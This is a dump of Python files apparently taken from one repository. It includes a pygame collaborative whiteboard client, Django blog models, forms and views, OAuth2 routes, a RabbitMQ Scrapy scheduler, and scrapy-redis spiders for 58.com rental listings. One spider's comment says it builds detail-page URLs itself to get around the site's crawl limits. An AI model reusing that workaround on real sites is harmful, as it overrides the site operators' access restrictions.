self.active_box = None
self.load_actions(self._hist)
self.__modification_allowed = copy.deepcopy(self._hist["auth"])
# if some client names are in this list, you will have the authorisation to edit their textboxes
for action in self._hist["actions"]:
if action["type"] == "Text_box":
self.append_text_box(TextBox(**action["params"]))
"""
Encapsulation
"""
def is_done(self):
return self._done
def end(self):
self._done = True
def get_config(self, maplist):
"""
Getter of config file. Uses a list of keys to traverse the config dict
:param maplist: list of keys from parent to child to get the wanted value (list)
:return: value of a key in the config file (object)
"""
if not type(maplist) == list:
maplist = list(maplist)
try:
return reduce(operator.getitem, maplist, self._config)
except (KeyError, TypeError):
return None
def set_config(self, maplist, value):
"""
Setter of config file. Uses the getter and assigns value to a key
:param maplist: list of keys from parent to child to get the wanted value (list)
:param value: value to set (object)
:return: None if failed
"""
if not type(maplist) == list:
maplist = list(maplist)
try:
self.get_config(maplist[:-1])[maplist[-1]] = value
except (KeyError, TypeError):
return None
def get_hist(self, key=None):
if key is None:
return self._hist
else:
return self._hist[key]
def add_to_hist(self, value):
self._hist["actions"].append(value)
@property
def screen(self):
return self.__screen
def clear_screen(self):
"""
Clear the screen by coloring it to background color. Does not color the toolbar
:return:
"""
self.__screen.fill(self.get_config(["board_background_color"]), (0, self.get_config(["toolbar_y"]) + 1,
self.get_config(["width"]),
self.get_config(["length"]) - self.get_config(
["toolbar_y"]) + 1))
def is_drawing(self):
return self._draw
def pen_up(self):
self._draw = False
def pen_down(self):
self._draw = True
@property
def name(self):
return self._name
@property
def modification_allowed(self):
return self.__modification_allowed
@property
def last_pos(self):
return self._last_pos
def reset_last_pos(self):
self._last_pos = None
def update_last_pos(self):
self._last_pos = self._mouse_position
def __get_mouse_position(self):
return self._mouse_position
def __set_mouse_position(self, value):
self._mouse_position = value
mouse_position = property(__get_mouse_position, __set_mouse_position)
def get_text_boxes(self):
return self._text_boxes
def append_text_box(self, textbox):
self._text_boxes.append(textbox)
def del_text_box(self, textbox):
self._text_boxes.remove(textbox)
def draw(self, obj, timestamp):
"""
Method to draw figures defined in figures.py. Also adds drawn objects to history.
:param obj: class of figure to draw
:param timestamp: timestamp at which the drawing happens
:return: None
"""
# Draw object on screen
obj.draw(self.__screen)
# Create dict containing object parameters and right timestamp to add to history
hist_obj = {"type": obj.type, "timestamp": timestamp, "params": obj.fetch_params(), "client": self._name}
# Special case if it's a Text_box object, we need to get the correct box id
if hist_obj["type"] == "Text_box":
hist_obj["id"] = obj.id_counter
hist_obj["owner"] = self._name
self.add_to_hist(hist_obj)
def switch_config(self, event):
"""
Switch between different modes
:param event: Action by the user : a mouse click on either modes, colors or font sizes
:return: None
"""
if event == "quit":
self.set_config(["mode"], "quit")
# We go through each mode, color and font size to see if that mode should be triggered by the event
else:
for mod in self.__modes:
if mod.is_triggered(event):
self.set_config(["mode"], mod.name)
for col in self.__colors:
if col.is_triggered(event):
self.set_config(["text_box", "text_color"], col.color)
self.set_config(["active_color"], col.color)
for font_size_ in self.__font_sizes:
if font_size_.is_triggered(event):
self.set_config(["font_size"], font_size_.font_size)
if self.__auth_box.is_triggered(event):
self._erasing_auth = not self._erasing_auth
self.__auth_box.switch(self.__screen, self._erasing_auth, self.__modification_allowed, self._name)
self._hist["auth"] = [self._name, self._erasing_auth]
if self.__save_box.is_triggered(event):
self.__save_box.save(self.__screen, self)
print("Le dessin a été sauvegardé dans le dossier")
def set_active_box(self, box, new=True):
"""
A method specific to text boxes : select an existing box or one that has just been created to edit. This box is
thus said to be "active"
:param box: instance of the TextBox class
:param new: boolean to specify if the box was just created or already existed
:return:
"""
# If the selected box is already the active one, do nothing
if box == self.active_box:
return
# If there is a box that is active we must turn it into "inactive"
if self.active_box is not None:
# Change its color to the "inactive color"
self.active_box.set_textbox_color(self.get_config(["text_box", "inactive_color"]))
# Select the id of previous active box
id_counter = self.active_box.id_counter
# Find the previous active box and change its color in history
for action in [x for x in self.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
action["params"]["text"] = self.active_box.get_textbox_text()
action['params']["box_color"] = self.get_config(["text_box", "inactive_color"])
# Render it
self.active_box.draw(self.__screen)
# If selected box already exists on the whiteboard we must turn it into "active"
if not new:
id_counter = box.id_counter
for action in [x for x in self.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
action['params']["box_color"] = self.get_config(["text_box", "active_color"])
# Draw the newly activated box
self.active_box = box
self.active_box.draw(self.__screen)
pygame.display.flip()
def draw_action(self, action):
"""
Draw the result of an action by the user on the whiteboard
:param action: usually a mouse action by the user
:return:
"""
if action["type"] == "Point":
draw_point(action["params"], self.__screen)
if action["type"] == "Line":
draw_line(action["params"], self.__screen)
if action["type"] == "Text_box":
draw_textbox(action["params"], self.__screen)
if action["type"] == "rect":
draw_rect(action["params"], self.__screen)
if action["type"] == "circle":
draw_circle(action["params"], self.__screen)
def load_actions(self, hist):
"""
Load actions from history
:param hist: list of dict representing the history of actions in the whiteboard session
:return:
"""
# Sort actions chronologically
sred = sorted(hist["actions"],
key=lambda value: value["timestamp"])
# Go through each action and draw it
for action in sred:
self.draw_action(action)
pygame.display.flip()
def start(self, connexion_avec_serveur):
"""
Start and run a whiteboard window
:param connexion_avec_serveur: socket to connect with server (socket.socket)
:return:
"""
# Initialize timestamp
last_timestamp_sent = 0
while not self.is_done():
# Browse all events done by user
for event in pygame.event.get():
# If user closes the window, quit the whiteboard
if self.get_config(["mode"]) == "quit":
self.end()
break
# Use specific handling method for current drawing mode
self.__handler[self.get_config(["mode"])].handle_all(event)
# msg_a_envoyer["message"] = "CARRY ON"
# Send dict history to server
if self._hist["auth"] != [self._name, self._erasing_auth]:
self._hist["auth"] = []
new_modifs = [modif for modif in self.get_hist()["actions"] if
(modif["timestamp"] > last_timestamp_sent and self._name == modif["client"])]
message_a_envoyer = {"message": "", 'actions': new_modifs, "auth": self._hist["auth"]}
connexion_avec_serveur.send(dict_to_binary(message_a_envoyer))
self._hist["auth"] = []
# Update last timestamp sent
if new_modifs:
last_timestamp_sent = max([modif["timestamp"] for modif in new_modifs])
# Dict received from server
try:
new_hist = binary_to_dict(connexion_avec_serveur.recv(2 ** 24))
except (ConnectionResetError, ConnectionAbortedError) as e:
print("Le serveur a été éteint, veuillez le relancer")
self._done = True
pass
# Consider actions made by another client after new_last_timestamp
new_actions = [action for action in new_hist["actions"] if action["client"] != self._name]
for action in new_actions:
# Here there are two cases, a new figure (point, line, rect, circle, new text box) is created or an
# existing text box is modified. For this second case, we use the variable "matched" as indicator
matched = False
if action["type"] == "Text_box":
# Find the text box id
for textbox in [x for x in self._hist["actions"] if x["type"] == "Text_box"]:
if action["id"] == textbox["id"]:
# Modify it with the newly acquired parameters from server
textbox["params"]["text"], textbox["params"]["w"] = action["params"]["text"], \
action["params"]["w"]
action_to_update_textbox = action
for element in self.get_text_boxes():
if element.id_counter == action["id"]:
self.del_text_box(element)
self.append_text_box(TextBox(**action_to_update_textbox["params"]))
# Draw the modified text box with updated parameters
self.clear_screen()
self.load_actions(self._hist)
matched = True
# If we are in the first case, we add the new actions to history and draw them
if not matched:
self.add_to_hist(action)
if action["type"] == "Text_box":
self.append_text_box(TextBox(**action["params"]))
self.draw_action(action)
if self._name in new_hist["auth"]:
new_hist["auth"].remove(self._name)
if new_hist["auth"] != self.__modification_allowed:
self.__modification_allowed = copy.deepcopy(new_hist["auth"])
pygame.display.flip()
# Once we are done, we quit pygame and send end message
pygame.quit()
print("Fermeture de la connexion")
message_a_envoyer["message"] = "END"
try:
connexion_avec_serveur.send(dict_to_binary(message_a_envoyer))
except (ConnectionResetError, BrokenPipeError) as e:
print("Il n'y a pas de message à envoyer au serveur")
connexion_avec_serveur.close()
def start_local(self):
"""
Starts Whiteboard locally. Used to test stuff and debug.
:return:
"""
while not self.is_done():
for event in pygame.event.get():
if self.get_config(["mode"]) == "quit":
self.end()
break
self.__handler[self.get_config(["mode"])].handle_all(event)
pygame.display.flip()
pygame.quit()
|
Python
| 515
| 39.850487
| 120
|
/src/white_board.py
| 0.542257
| 0.54007
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: blogroll
Description :
Author : JHao
date: 2020/10/9
-------------------------------------------------
Change Activity:
2020/10/9:
-------------------------------------------------
"""
__author__ = 'JHao'
sites = [
{"url": "https://www.zaoshu.io/", "name": "造数", "desc": "智能云爬虫"},
{"url": "http://brucedone.com/", "name": "大鱼的鱼塘", "desc": "大鱼的鱼塘 - 一个总会有收获的地方"},
{"url": "http://www.songluyi.com/", "name": "灯塔水母", "desc": "灯塔水母"},
{"url": "http://blog.topspeedsnail.com/", "name": "斗大的熊猫", "desc": "本博客专注于技术,Linux,编程,Python,C,Ubuntu、开源软件、Github等"},
{"url": "https://www.urlteam.org/", "name": "URL-team", "desc": "URL-team"},
]
|
Python
| 21
| 36.714287
| 121
|
/awssam/django-blog/src/django_blog/blogroll.py
| 0.42225
| 0.403287
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from scrapy_redis.spiders import RedisSpider
from scrapy.selector import Selector
class testSpider(RedisSpider):
name = 'testip'
redis_key = 'testip'
def parse(self,response):
response_selector = Selector(response)
code=response_selector.xpath(r'//div[contains(@class,"well")]/p[1]/code/text()')
print code
|
Python
| 10
| 35.700001
| 88
|
/tc_zufang/tc_zufang-slave/tc_zufang/spiders/testip.py
| 0.673913
| 0.668478
|
mrpal39/ev_code
|
refs/heads/master
|
from django.db import models
from tinymce.models import HTMLField
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Post(models.Model):
title = models.CharField(max_length=100)
content = models.TextField()
description =HTMLField()
date_posted = models.DateTimeField(default=timezone.now)
author = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('post-detail', kwargs={'pk': self.pk})
class feeds(models.Model):
title = models.CharField(max_length=100)
overview = models.TextField(max_length=20)
timestamp = models.DateTimeField(auto_now_add=True)
description =HTMLField()
thumbnail = models.ImageField()
featured = models.BooleanField()
# content = HTMLField()
def __str__(self):
return self.title
class Products(models.Model):
title =models.CharField(max_length=100)
description =models.TextField(blank=True)
price =models.DecimalField(decimal_places=2,max_digits=1000)
summary =models.TextField(blank=False, null=False)
# featured =models.BooleanField()
class MyModel(models.Model):
...
content = HTMLField()
|
Python
| 56
| 22.214285
| 67
|
/awssam/ideablog/core/models.py
| 0.698999
| 0.686682
|
mrpal39/ev_code
|
refs/heads/master
|
import connection
import queue
from scrapy.utils.misc import load_object
from scrapy.utils.job import job_dir
SCHEDULER_PERSIST = False
QUEUE_CLASS = 'queue.SpiderQueue'
IDLE_BEFORE_CLOSE = 0
class Scheduler(object):
def __init__(self, server, persist,
queue_key, queue_cls, idle_before_close,
stats, *args, **kwargs):
self.server = server
self.persist = persist
self.queue_key = queue_key
self.queue_cls = queue_cls
self.idle_before_close = idle_before_close
self.stats = stats
def __len__(self):
return len(self.queue)
@classmethod
def from_crawler(cls, crawler):
if not crawler.spider.islinkgenerator:
settings = crawler.settings
persist = settings.get('SCHEDULER_PERSIST', SCHEDULER_PERSIST)
queue_key = "%s:requests" % crawler.spider.name
queue_cls = queue.SpiderQueue
idle_before_close = settings.get('SCHEDULER_IDLE_BEFORE_CLOSE', IDLE_BEFORE_CLOSE)
server = connection.from_settings(settings, crawler.spider.name)
stats = crawler.stats
return cls(server, persist, queue_key, queue_cls, idle_before_close, stats)
else:
settings = crawler.settings
dupefilter_cls = load_object(settings['DUPEFILTER_CLASS'])
dupefilter = dupefilter_cls.from_settings(settings)
pqclass = load_object(settings['SCHEDULER_PRIORITY_QUEUE'])
dqclass = load_object(settings['SCHEDULER_DISK_QUEUE'])
mqclass = load_object(settings['SCHEDULER_MEMORY_QUEUE'])
logunser = settings.getbool('LOG_UNSERIALIZABLE_REQUESTS', settings.getbool('SCHEDULER_DEBUG'))
core_scheduler = load_object('scrapy.core.scheduler.Scheduler')
return core_scheduler(dupefilter, jobdir=job_dir(settings), logunser=logunser,
stats=crawler.stats, pqclass=pqclass, dqclass=dqclass, mqclass=mqclass)
def open(self, spider):
self.spider = spider
self.queue = self.queue_cls(self.server, spider, self.queue_key)
if len(self.queue):
spider.log("Resuming crawl (%d requests scheduled)" % len(self.queue))
def close(self, reason):
if not self.persist:
self.queue.clear()
connection.close(self.server)
def enqueue_request(self, request):
if self.stats:
self.stats.inc_value('scheduler/enqueued/rabbitmq', spider=self.spider)
self.queue.push(request)
def next_request(self):
request = self.queue.pop()
if request and self.stats:
self.stats.inc_value('scheduler/dequeued/rabbitmq', spider=self.spider)
return request
def has_pending_requests(self):
return len(self) > 0
|
Python
| 73
| 37.698631
| 107
|
/Web-UI/scrapyproject/scrapy_packages/rabbitmq/scheduler.py
| 0.635752
| 0.635044
|
mrpal39/ev_code
|
refs/heads/master
|
import scrapy
class MySpider(scrapy.Spider):
name = 'myspider'
start_urls = ['http://example.com']
def parse(self, response):
print(f"Existing settings: {self.settings.attributes.keys()}")
class MyExtension:
def __init__(self, log_is_enabled=False):
if log_is_enabled:
print("log is enabled!")
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
return cls(settings.getbool('LOG_ENABLED'))
|
Python
| 17
| 27.352942
| 70
|
/scrap/tutorial/scrap/spiders/testing.py
| 0.638254
| 0.638254
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from scrapy_redis.spiders import RedisSpider
from scrapy.selector import Selector
from tc_zufang.utils.result_parse import list_first_item
from scrapy.http import Request
from tc_zufang.utils.InsertRedis import inserintotc,inserintota
import re
defaultencoding = 'utf-8'
'''
58同城的爬虫
'''
#继承自RedisSpider,则start_urls可以从redis读取
#继承自BaseSpider,则start_urls需要写出来
class TczufangSpider(RedisSpider):
name='basic'
start_urls=(
'http://dg.58.com/chuzu/',
'http://sw.58.com/chuzu/',
'http://sz.58.com/chuzu/',
'http://gz.58.com/chuzu/',
# 'http://fs.58.com/chuzu/',
# 'http://zs.58.com/chuzu/',
# 'http://zh.58.com/chuzu/',
# 'http://huizhou.58.com/chuzu/',
# 'http://jm.58.com/chuzu/',
# 'http://st.58.com/chuzu/',
# 'http://zhanjiang.58.com/chuzu/',
# 'http://zq.58.com/chuzu/',
# 'http://mm.58.com/chuzu/',
# 'http://jy.58.com/chuzu/',
# 'http://mz.58.com/chuzu/',
# 'http://qingyuan.58.com/chuzu/',
# 'http://yj.58.com/chuzu/',
# 'http://sg.58.com/chuzu/',
# 'http://heyuan.58.com/chuzu/',
# 'http://yf.58.com/chuzu/',
# 'http://chaozhou.58.com/chuzu/',
# 'http://taishan.58.com/chuzu/',
# 'http://yangchun.58.com/chuzu/',
# 'http://sd.58.com/chuzu/',
# 'http://huidong.58.com/chuzu/',
# 'http:// boluo.58.com/chuzu/',
# )
# redis_key = 'tczufangCrawler:start_urls'
#解析从start_urls下载返回的页面
#页面页面有两个目的:
#第一个:解析获取下一页的地址,将下一页的地址传递给爬虫调度器,以便作为爬虫的下一次请求
#第二个:获取详情页地址,再对详情页进行下一步的解析
redis_key = 'start_urls'
def parse(self, response):
#获取所访问的地址
response_url=re.findall('^http\:\/\/\w+\.58\.com',response.url)
response_selector = Selector(response)
next_link=list_first_item(response_selector.xpath(u'//div[contains(@class,"pager")]/a[contains(@class,"next")]/@href').extract())
detail_link=response_selector.xpath(u'//div[contains(@class,"listBox")]/ul[contains(@class,"listUl")]/li/@logr').extract()
if next_link:
if detail_link:
# print next_link
# yield Request(next_link,callback=self.parse)
inserintotc(next_link, 1)
print '#########[success] the next link ' + next_link + ' is insert into the redis queue#########'
for detail_link in response_selector.xpath(u'//div[contains(@class,"listBox")]/ul[contains(@class,"listUl")]/li/@logr').extract():
#gz_2_39755299868183_28191154595392_sortid:1486483205000 @ ses:busitime ^ desc @ pubid:5453707因为58同城的详情页做了爬取限制,所以由自己构造详情页id
#构造详情页url
# detail_link='http://dg.58.com/zufang/'+detail_link.split('_')[3]+'x.shtml'
detail_link = response_url[0]+'/zufang/' + detail_link.split('_')[3] + 'x.shtml'
#对详情页进行解析cd
if detail_link:
inserintota(detail_link,2)
print '[success] the detail link ' + detail_link + ' is insert into the redis queue'
|
Python
| 71
| 42.478874
| 138
|
/tc_zufang/tc_zufang/tc_zufang/spiders/tczufang_detail_spider.py
| 0.582955
| 0.545366
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class PropertiesPipeline(object):
def process_item(self, item, spider):
return item
ITEM_PIPELINES = {
'scrapy.pipelines.images.ImagesPipeline': 1,
'properties.pipelines.geo.GeoPipeline': 400,
}
IMAGES_STORE = 'images'
IMAGES_THUMBS = { 'small': (30, 30) }
|
Python
| 20
| 22.35
| 65
|
/scrap/properties/properties/pipelines.py
| 0.706009
| 0.686695
|
mrpal39/ev_code
|
refs/heads/master
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django.contrib.auth.forms import PasswordChangeForm
class CreateProject(forms.Form):
projectname = forms.SlugField(label="Enter project name", max_length=50, required=True)
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Create Project'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
class DeleteProject(forms.Form):
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Confirm'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
class CreatePipeline(forms.Form):
pipelinename = forms.SlugField(label="Pipeline name", max_length=50, required=True)
pipelineorder = forms.IntegerField(label="Order", required=True, min_value=1, max_value=900)
pipelinefunction = forms.CharField(label="Pipeline function:", required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class LinkGenerator(forms.Form):
function = forms.CharField(label="Write your link generator function here:", required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class Scraper(forms.Form):
function = forms.CharField(label="Write your scraper function here:", required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class ItemName(forms.Form):
itemname = forms.SlugField(label="Enter item name", max_length=50, required=True)
helper = FormHelper()
helper.form_tag = False
class FieldName(forms.Form):
fieldname = forms.SlugField(label="Field 1", max_length=50, required=False)
extra_field_count = forms.CharField(widget=forms.HiddenInput())
helper = FormHelper()
helper.form_tag = False
def __init__(self, *args, **kwargs):
extra_fields = kwargs.pop('extra', 0)
super(FieldName, self).__init__(*args, **kwargs)
self.fields['extra_field_count'].initial = extra_fields
for index in range(int(extra_fields)):
# generate extra fields in the number specified via extra_fields
self.fields['field_{index}'.format(index=index+2)] = forms.CharField(required=False)
class ChangePass(PasswordChangeForm):
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Change'))
class Settings(forms.Form):
settings = forms.CharField(required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class ShareDB(forms.Form):
username = forms.CharField(label="Enter the account name for the user with whom you want to share the database", max_length=150, required=True)
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Share'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
class ShareProject(forms.Form):
username = forms.CharField(label="Enter the account name for the user with whom you want to share the project", max_length=150, required=True)
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Share'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
|
Python
| 90
| 36.077778
| 147
|
/Web-UI/scrapyproject/forms.py
| 0.706535
| 0.70024
|
mrpal39/ev_code
|
refs/heads/master
|
# Generated by Django 3.1.3 on 2020-11-13 06:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0003_auto_20201113_0620'),
]
operations = [
migrations.AddField(
model_name='feeds',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='feeds',
name='overview',
field=models.TextField(max_length=20),
),
]
|
Python
| 23
| 22.304348
| 50
|
/awssam/ideablog/core/migrations/0004_auto_20201113_0633.py
| 0.559702
| 0.498134
|
mrpal39/ev_code
|
refs/heads/master
|
from django.conf.urls import url, include
import oauth2_provider.views as oauth2_views
from django.conf import settings
from .views import ApiEndpoint
from django.urls import include, path
# OAuth2 provider endpoints
oauth2_endpoint_views = [
path('authorize/', oauth2_views.AuthorizationView.as_view(), name="authorize"),
path('token/', oauth2_views.TokenView.as_view(), name="token"),
path('revoke-token/', oauth2_views.RevokeTokenView.as_view(), name="revoke-token"),
]
if settings.DEBUG:
# OAuth2 Application Management endpoints
oauth2_endpoint_views += [
path('applications/', oauth2_views.ApplicationList.as_view(), name="list"),
path('applications/register/', oauth2_views.ApplicationRegistration.as_view(), name="register"),
path('applications/<pk>/', oauth2_views.ApplicationDetail.as_view(), name="detail"),
path('applications/<pk>/delete/', oauth2_views.ApplicationDelete.as_view(), name="delete"),
path('applications/<pk>/update/', oauth2_views.ApplicationUpdate.as_view(), name="update"),
]
# OAuth2 Token Management endpoints
oauth2_endpoint_views += [
path('authorized-tokens/', oauth2_views.AuthorizedTokensListView.as_view(), name="authorized-token-list"),
path('authorized-tokens/<pk>/delete/', oauth2_views.AuthorizedTokenDeleteView.as_view(),
name="authorized-token-delete"),
]
urlpatterns = [
# OAuth 2 endpoints:
path('o/', include(oauth2_endpoint_views, namespace="oauth2_provider")),
path('api/hello', ApiEndpoint.as_view()), # an example resource endpoint
]
|
Python
| 35
| 44.857143
| 114
|
/awssam/iam/users/urls.py
| 0.702181
| 0.689097
|
mrpal39/ev_code
|
refs/heads/master
|
from django.http import HttpResponse, Http404
from django.shortcuts import render
import datetime
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.contrib.auth.views import login as loginview
from registration.backends.simple import views
from django.contrib.auth import authenticate, get_user_model, login
from registration import signals
from scrapyproject.views import mongodb_user_creation, linux_user_creation
from scrapyproject.scrapy_packages import settings
try:
# Python 3
from urllib.parse import urlparse
except ImportError:
# Python 2
from urlparse import urlparse
try:
from urllib.parse import quote
except:
from urllib import quote
User = get_user_model()
class MyRegistrationView(views.RegistrationView):
def register(self, form):
new_user = form.save()
new_user = authenticate(
username=getattr(new_user, User.USERNAME_FIELD),
password=form.cleaned_data['password1']
)
#perform additional account creation here (MongoDB, local Unix accounts, etc.)
mongodb_user_creation(getattr(new_user, User.USERNAME_FIELD), form.cleaned_data['password1'])
if settings.LINUX_USER_CREATION_ENABLED:
try:
linux_user_creation(getattr(new_user, User.USERNAME_FIELD), form.cleaned_data['password1'])
except:
pass
login(self.request, new_user)
signals.user_registered.send(sender=self.__class__,
user=new_user,
request=self.request)
return new_user
def get_success_url(self, user):
return "/project"
def custom_login(request):
if request.user.is_authenticated():
return HttpResponseRedirect('/project')
else:
return loginview(request)
def custom_register(request):
if request.user.is_authenticated():
return HttpResponseRedirect('/project')
else:
register = MyRegistrationView.as_view()
return register(request)
|
Python
| 67
| 30.194031
| 107
|
/Web-UI/mysite/views.py
| 0.677033
| 0.673684
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scrapyproject', '0004_pipeline_pipeline_function'),
]
operations = [
migrations.RemoveField(
model_name='project',
name='settings',
),
migrations.AddField(
model_name='project',
name='settings_link_generator',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='project',
name='settings_scraper',
field=models.TextField(blank=True),
),
]
|
Python
| 28
| 23.785715
| 61
|
/Web-UI/scrapyproject/migrations/0005_auto_20170213_1053.py
| 0.56196
| 0.554755
|
mrpal39/ev_code
|
refs/heads/master
|
# Generated by Django 3.1.3 on 2020-11-14 04:52
from django.db import migrations, models
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('core', '0005_feeds_content'),
]
operations = [
migrations.CreateModel(
name='MyModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', tinymce.models.HTMLField()),
],
),
migrations.RemoveField(
model_name='feeds',
name='content',
),
migrations.RemoveField(
model_name='feeds',
name='description',
),
]
|
Python
| 29
| 24.379311
| 114
|
/awssam/ideablog/core/migrations/0006_auto_20201114_0452.py
| 0.540761
| 0.514946
|
mrpal39/ev_code
|
refs/heads/master
|
# This script is written under the username admin, with project name Retrofm
# Change the class name AdminRetrofmSpider accordingly
import datetime
_start_date = datetime.date(2012, 12, 25)
_initial_date = datetime.date(2012, 12, 25)
_priority = 0
start_urls = ['http://retrofm.ru']
def parse(self, response):
while AdminRetrofmSpider._start_date < self.datetime.date.today():
AdminRetrofmSpider._priority -= 1
AdminRetrofmSpider._start_date += self.datetime.timedelta(days=1)
theurlstart = 'http://retrofm.ru/index.php?go=Playlist&date=%s' % (
AdminRetrofmSpider._start_date.strftime("%d.%m.%Y"))
theurls = []
theurls.append(theurlstart + '&time_start=17%3A00&time_stop=23%3A59')
theurls.append(theurlstart + '&time_start=11%3A00&time_stop=17%3A01')
theurls.append(theurlstart + '&time_start=05%3A00&time_stop=11%3A01')
theurls.append(theurlstart + '&time_start=00%3A00&time_stop=05%3A01')
for theurl in theurls:
request = Request(theurl, method="GET",
dont_filter=True, priority=(AdminRetrofmSpider._priority), callback=self.parse)
self.insert_link(request)
|
Python
| 26
| 45.23077
| 109
|
/Web-UI/examples/link_generator.py
| 0.669442
| 0.620316
|
mrpal39/ev_code
|
refs/heads/master
|
from django import forms
#Building a search view
class SearchForm(forms.Form):
query =forms.CharField()
class uploadForm(forms.ModelForm):
images=forms.ImageField()
# # from .forms import EmailPostForm, CommentForm , SearchForm
# User Repositories='https://libraries.io/api/github/:login/repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# user=' https://libraries.io/api/github/andrew?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# Repository=' https://libraries.io/api/github/:owner/:name?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# =' https://libraries.io/api/github/gruntjs/grunt/projects?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectSearch=' https://libraries.io/api/search?q=grunt&api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# Platforms= ' GET https://libraries.io/api/platforms?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# https://libraries.io/api/NPM/base62?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectDependen https://libraries.io/api/:platform/:name/:version/dependencies?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# ' https://libraries.io/api/NPM/base62/2.0.1/dependencies?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# DependentReposito= https://libraries.io/api/NPM/base62/dependent_repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectContributo= https://libraries.io/api/NPM/base62/contributors?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectSourceRank='https://libraries.io/api/NPM/base62/sourcerank?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
|
Python
| 30
| 51.833332
| 125
|
/myapi/devfile/core/forms.py
| 0.768939
| 0.616793
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
#如果没有下一页的地址则返回none
list_first_item = lambda x:x[0] if x else None
|
Python
| 4
| 21.75
| 46
|
/tc_zufang/tc_zufang-slave/tc_zufang/utils/result_parse.py
| 0.659341
| 0.637363
|
mrpal39/ev_code
|
refs/heads/master
|
from django import forms
from core.models import Comment
#Building a search view
class SearchForm(forms.Form):
query =forms.CharField()
class EmailPostForm(forms.Form):
name = forms.CharField(max_length=25)
email = forms.EmailField()
to = forms.EmailField()
comments = forms.CharField(required=False,
widget=forms.Textarea)
class CommentForm(forms.ModelForm):
url = forms.URLField(label='网址', required=False)
email = forms.EmailField(label='电子邮箱', required=True)
name = forms.CharField(
label='姓名',
widget=forms.TextInput(
attrs={
'value': "",
'size': "30",
'maxlength': "245",
'aria-required': 'true'}))
parent_comment_id = forms.IntegerField(
widget=forms.HiddenInput, required=False)
class Meta:
model = Comment
fields = ['body']
|
Python
| 35
| 25.542856
| 57
|
/myapi/fullfeblog/blog/forms.py
| 0.59375
| 0.586207
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Create your views here.
import json
from django.http import JsonResponse
from django_blog.util import PageInfo
from blog.models import Article, Comment
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render, get_object_or_404
def get_page(request):
page_number = request.GET.get("page")
return 1 if not page_number or not page_number.isdigit() else int(page_number)
def index(request):
_blog_list = Article.objects.all().order_by('-date_time')[0:5]
_blog_hot = Article.objects.all().order_by('-view')[0:6]
return render(request, 'blog/index.html', {"blog_list": _blog_list, "blog_hot": _blog_hot})
def blog_list(request):
"""
列表
:param request:
:return:
"""
page_number = get_page(request)
blog_count = Article.objects.count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.all()[page_info.index_start: page_info.index_end]
return render(request, 'blog/list.html', {"blog_list": _blog_list, "page_info": page_info})
def category(request, name):
"""
分类
:param request:
:param name:
:return:
"""
page_number = get_page(request)
blog_count = Article.objects.filter(category__name=name).count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.filter(category__name=name)[page_info.index_start: page_info.index_end]
return render(request, 'blog/category.html', {"blog_list": _blog_list, "page_info": page_info,
"category": name})
def tag(request, name):
"""
标签
:param request:
:param name
:return:
"""
page_number = get_page(request)
blog_count = Article.objects.filter(tag__tag_name=name).count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.filter(tag__tag_name=name)[page_info.index_start: page_info.index_end]
return render(request, 'blog/tag.html', {"blog_list": _blog_list,
"tag": name,
"page_info": page_info})
def archive(request):
"""
文章归档
:param request:
:return:
"""
